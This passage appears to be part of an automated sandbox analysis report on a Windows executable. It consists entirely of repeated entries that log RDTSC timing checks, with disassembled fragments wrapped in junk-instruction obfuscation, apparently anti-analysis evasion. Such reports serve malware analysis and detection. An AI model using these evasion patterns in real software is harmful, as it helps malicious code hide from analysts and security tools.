                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108EA20 second address: 108EA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108EB61 second address: 108EB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108ECDA second address: 108ECDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108ECDE second address: 108ECE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108ECE4 second address: 108ECEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F87BC5165B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1054E86 second address: 1054E8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1054E8A second address: 1054E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1054E90 second address: 1054E9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F87BD02CC98h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1054E9F second address: 1054EA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108F0F7 second address: 108F108 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 jnp 00007F87BD02CC9Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 108F108 second address: 108F114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1094CA3 second address: 1094CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1094CA7 second address: 1094CB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F87BC5165BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1094CB9 second address: 1094CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1094E01 second address: 1094E21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F87BC5165BAh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F87BC5165C4h 0x00000012 pushad 0x00000013 jg 00007F87BC5165B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1094E21 second address: 1094E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jl 00007F87BD02CC86h 0x00000012 pop edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10936DC second address: 10936E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10936E3 second address: 10936E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109AAE8 second address: 109AAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109AAEC second address: 109AAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109A3D6 second address: 109A3DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109A3DA second address: 109A3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109A3E6 second address: 109A437 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BC5165C7h 0x00000007 jmp 00007F87BC5165C8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F87BC5165BCh 0x00000013 popad 0x00000014 pushad 0x00000015 jne 00007F87BC5165B8h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jnc 00007F87BC5165B6h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109A437 second address: 109A43B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109A43B second address: 109A44F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F87BC5165BAh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109B30B second address: 109B36A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F87BD02CC88h 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 jmp 00007F87BD02CC97h 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push edi 0x0000001a pushad 0x0000001b jmp 00007F87BD02CC8Dh 0x00000020 jo 00007F87BD02CC86h 0x00000026 popad 0x00000027 pop edi 0x00000028 mov eax, dword ptr [eax] 0x0000002a jno 00007F87BD02CC92h 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 push ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109BACC second address: 109BAD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109BF76 second address: 109BF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109C05B second address: 109C066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109C239 second address: 109C23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109C3E4 second address: 109C3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109C3EA second address: 109C416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F87BD02CC96h 0x0000000b jmp 00007F87BD02CC90h 0x00000010 popad 0x00000011 push eax 0x00000012 jbe 00007F87BD02CC94h 0x00000018 pushad 0x00000019 jnc 00007F87BD02CC86h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109CB5A second address: 109CB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109DD9F second address: 109DDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F87BD02CC92h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109DDB5 second address: 109DDB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109F0FA second address: 109F111 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F87BD02CC8Ch 0x00000008 jl 00007F87BD02CC86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109F111 second address: 109F117 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109DDB9 second address: 109DDD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F87BD02CC8Dh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109F117 second address: 109F185 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F87BC5165B8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 0000001Ch 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 or dword ptr [ebp+12DC22E8h], eax 0x00000029 cld 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push eax 0x0000002f call 00007F87BC5165B8h 0x00000034 pop eax 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc eax 0x00000042 push eax 0x00000043 ret 0x00000044 pop eax 0x00000045 ret 0x00000046 push eax 0x00000047 mov edi, dword ptr [ebp+12DC3583h] 0x0000004d pop edi 0x0000004e push 00000000h 0x00000050 xchg eax, ebx 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jne 00007F87BC5165B6h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109F185 second address: 109F1A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b jnp 00007F87BD02CC94h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109F1A1 second address: 109F1A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109FB9C second address: 109FBB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F87BD02CC98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109FBB8 second address: 109FBC2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F87BC5165BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109F93B second address: 109F942 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 109FBC2 second address: 109FBE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F87BC5165C6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A4FA1 second address: 10A4FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A1A24 second address: 10A1A29 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A4FA6 second address: 10A4FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1064046 second address: 1064050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F87BC5165B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1064050 second address: 1064054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1064054 second address: 1064075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F87BC5165CBh 0x0000000c jmp 00007F87BC5165C5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 1064075 second address: 106407F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F87BD02CC86h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A7AA6 second address: 10A7AB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F87BC5165B6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A9C60 second address: 10A9C6E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A9C6E second address: 10A9C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10ABBB8 second address: 10ABBBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A9C73 second address: 10A9C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10ABBBE second address: 10ABBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A9C79 second address: 10A9C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10A9C7D second address: 10A9C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10ACB9B second address: 10ACC33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F87BC5165B8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 mov bh, 07h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F87BC5165B8h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 mov bx, 623Ah 0x00000047 push 00000000h 0x00000049 push 00000000h 0x0000004b push eax 0x0000004c call 00007F87BC5165B8h 0x00000051 pop eax 0x00000052 mov dword ptr [esp+04h], eax 0x00000056 add dword ptr [esp+04h], 0000001Dh 0x0000005e inc eax 0x0000005f push eax 0x00000060 ret 0x00000061 pop eax 0x00000062 ret 0x00000063 push eax 0x00000064 push eax 0x00000065 push edx 0x00000066 jmp 00007F87BC5165C9h 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10AFB08 second address: 10AFB0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10AFB0E second address: 10AFB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10AFB13 second address: 10AFB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F87BD02CC97h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10ADD02 second address: 10ADD0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F87BC5165B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10AFB33 second address: 10AFB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10AFB39 second address: 10AFB54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f js 00007F87BC5165B6h 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10AFB54 second address: 10AFB76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC99h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10AFB76 second address: 10AFB7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10ADDE2 second address: 10ADDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B2240 second address: 10B2245 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B466E second address: 10B46C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 mov edi, dword ptr [ebp+12DC1C41h] 0x0000000e mov dword ptr [ebp+12DC31D9h], ecx 0x00000014 push 00000000h 0x00000016 pushad 0x00000017 mov cl, bh 0x00000019 jmp 00007F87BD02CC95h 0x0000001e popad 0x0000001f push 00000000h 0x00000021 xchg eax, esi 0x00000022 pushad 0x00000023 push edi 0x00000024 push ecx 0x00000025 pop ecx 0x00000026 pop edi 0x00000027 jmp 00007F87BD02CC96h 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B46C2 second address: 10B46C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B134B second address: 10B135A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F87BD02CC8Ah 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B35CB second address: 10B35D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B135A second address: 10B1385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F87BD02CC8Ch 0x00000008 jmp 00007F87BD02CC8Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F87BD02CC8Ah 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B5770 second address: 10B5776 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B256B second address: 10B256F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B35D1 second address: 10B35D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B1385 second address: 10B138B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B5776 second address: 10B577A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B138B second address: 10B140D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ebx, dword ptr [ebp+12DC33F7h] 0x0000000f push dword ptr fs:[00000000h] 0x00000016 mov bh, 64h 0x00000018 mov ebx, dword ptr [ebp+12DC23BAh] 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 jmp 00007F87BD02CC8Dh 0x0000002a mov eax, dword ptr [ebp+12DC0479h] 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F87BD02CC88h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a push FFFFFFFFh 0x0000004c push 00000000h 0x0000004e push ebp 0x0000004f call 00007F87BD02CC88h 0x00000054 pop ebp 0x00000055 mov dword ptr [esp+04h], ebp 0x00000059 add dword ptr [esp+04h], 00000015h 0x00000061 inc ebp 0x00000062 push ebp 0x00000063 ret 0x00000064 pop ebp 0x00000065 ret 0x00000066 sub dword ptr [ebp+12DC1B6Eh], ebx 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B36F6 second address: 10B36FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\47SXvEQ.exeRDTSC instruction interceptor: First address: 10B65D5 second address: 10B65DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
